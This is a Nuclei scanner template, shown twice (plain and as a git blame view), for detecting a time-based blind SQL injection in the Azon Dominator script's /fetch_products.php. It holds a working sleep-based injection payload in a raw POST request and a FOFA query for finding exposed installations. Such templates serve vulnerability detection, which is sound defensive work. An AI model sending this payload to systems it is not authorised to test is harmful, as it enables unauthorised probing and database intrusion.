nuclei-templates/http/vulnerabilities/other/azon-dominator-sqli.yaml

id: azon-dominator-sqli

info:
  name: Azon Dominator - SQL Injection
  author: securityforeveryone
  severity: high
  description: |
    Azon Dominator software is vulnerable to a sql attack at /fetch_products.php.
  reference:
    - https://www.exploit-db.com/exploits/52059
    - https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
  metadata:
    verified: true
    max-request: 1
    fofa-query: "Azon Dominator"
  tags: azon,dominator,sqli

http:
  - raw:
      - |
        @timeout 20s
        POST /fetch_products.php HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code==500'
          - 'contains_all(body, "id", "name", "save_lists.php")'
        condition: and
# digest: 490a0046304402202ce1f0e22b85672b369795df066d967e2c595e6e8653e6ef08f900fea9abf5ea022078941fc73d22571802c7ba4a0f9011863bae207e5f54940d6bb4fc288dc2a4b3:922c64590222798bb761d5b6d8e72950
add azon dominator sqli 2024-07-03 17:14:55 +00:00			`id: azon-dominator-sqli`

			`info:`
			`name: Azon Dominator - SQL Injection`
			`author: securityforeveryone`
			`severity: high`
minor-update 2024-07-04 07:14:02 +00:00			`description: \|`
			`Azon Dominator software is vulnerable to a sql attack at /fetch_products.php.`
add azon dominator sqli 2024-07-03 17:14:55 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/52059`
			`- https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script`
			`metadata:`
Update azon-dominator-sqli.yaml 2024-07-04 08:12:53 +00:00			`verified: true`
add azon dominator sqli 2024-07-03 17:14:55 +00:00			`max-request: 1`
			`fofa-query: "Azon Dominator"`
Update azon-dominator-sqli.yaml 2024-07-04 08:12:53 +00:00			`tags: azon,dominator,sqli`
add azon dominator sqli 2024-07-03 17:14:55 +00:00
			`http:`
			`- raw:`
			`- \|`
minor-update 2024-07-04 07:14:02 +00:00			`@timeout 20s`
add azon dominator sqli 2024-07-03 17:14:55 +00:00			`POST /fetch_products.php HTTP/2`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'duration>=6'`
			`- 'status_code==500'`
Update azon-dominator-sqli.yaml 2024-07-04 08:12:53 +00:00			`- 'contains_all(body, "id", "name", "save_lists.php")'`
add azon dominator sqli 2024-07-03 17:14:55 +00:00			`condition: and`
Auto Template Signing [Thu Jul 4 08:18:06 UTC 2024] :robot: 2024-07-04 08:18:06 +00:00			`# digest: 490a0046304402202ce1f0e22b85672b369795df066d967e2c595e6e8653e6ef08f900fea9abf5ea022078941fc73d22571802c7ba4a0f9011863bae207e5f54940d6bb4fc288dc2a4b3:922c64590222798bb761d5b6d8e72950`